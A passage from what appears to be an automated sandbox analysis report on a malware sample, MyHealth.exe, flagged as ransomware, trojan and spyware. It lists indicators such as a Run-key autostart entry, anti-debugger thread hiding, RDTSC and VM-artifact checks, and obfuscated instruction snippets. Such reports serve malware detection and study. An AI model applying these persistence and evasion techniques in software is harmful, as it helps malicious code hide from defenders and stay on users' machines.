 Source: MyHealth.exe, 00000000.00000002.761370251.000000000040B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe Source: MyHealth.exe Binary or memory string: OriginalFilename vs MyHealth.exe Source: MyHealth.exe, 00000002.00000002.831234894.0000000002460000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs MyHealth.exe Source: MyHealth.exe, 00000002.00000002.831206989.0000000002450000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs MyHealth.exe Source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs MyHealth.exe Source: MyHealth.exe, 00000002.00000002.829796744.0000000000183000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs MyHealth.exe Source: MyHealth.exe, 00000002.00000000.760838720.000000000040B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe Source: MyHealth.exe Binary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@21/8@27/10
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_01
 Creates temporary files Show sources
 PE file has an executable .text section and no other executable section Show sources
 Source: MyHealth.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic) Show sources
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: MyHealth.exe Virustotal: Detection: 68% Source: MyHealth.exe Metadefender: Detection: 45% Source: MyHealth.exe ReversingLabs: Detection: 64%
 Spawns processes Show sources
 Uses an in-process (OLE) Automation server Show sources
 Writes ini files Show sources
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed Show sources
 Binary contains paths to debug symbols Show sources
 Source: Binary string: chkdsk.pdbGCTL source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp Source: Binary string: WWAHost.pdb source: MyHealth.exe Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp Source: Binary string: systray.pdb source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp Source: Binary string: systray.pdbGCTL source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp Source: Binary string: WWAHost.pdbUGP source: MyHealth.exe, 00000002.00000002.829524033.00000000000D0000.00000040.00000001.sdmp Source: Binary string: chkdsk.pdb source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1100285506.000000001F4BF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1102525562.000000001F3A0000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: jj0t1be8.exe Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp

#### Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 0_2_00401FEB push es; iretd 0_2_00401FF1 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 0_2_004013EC push 00402243h; ret 0_2_004013F6 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 0_2_004057B1 pushfd ; retf 0_2_004057B8 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000F63C9 push ecx; ret 2_3_000F63DC Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000ED81D push ecx; ret 2_3_000ED830 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A6E44 push eax; retn 0007h 2_3_000A6E45 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F41DE2D push ecx; ret 16_2_1F41DE40 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3A92E1 push es; iretd 16_2_1F3A92E8 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3AA830 push es; iretd 16_2_1F3AA831 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F41DE2D push ecx; ret 17_2_1F41DE40 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3A92E1 push es; iretd 17_2_1F3A92E8 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3AA830 push es; iretd 17_2_1F3AA831

#### Boot Survival:

 Creates an autostart registry key Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCN Jump to behavior Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCN Jump to behavior

#### Hooking and other Techniques for Hiding and Protection:

 Disables application error messsages (SetErrorMode) Show sources

#### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements Show sources
 Contains functionality for execution timing, often used to detect debuggers Show sources
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F495595 rdtsc 16_2_1F495595
 Found large amount of non-executed APIs Show sources
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe API coverage: 4.6 % Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe API coverage: 4.6 %
 May sleep (evasive loops) to hinder dynamic analysis Show sources
 Sample execution stops while process was sleeping (likely an evasion) Show sources
 Source: C:\Windows\explorer.exe Last function: Thread delayed Source: C:\Windows\System32\conhost.exe Last function: Thread delayed Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory) Show sources
 Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW, Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@ Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
 Queries a list of all running processes Show sources

#### Anti Debugging:

 Contains functionality to hide a thread from the debugger Show sources
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 15_2_02A50084 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 15_2_02A50084
 Hides threads from debuggers Show sources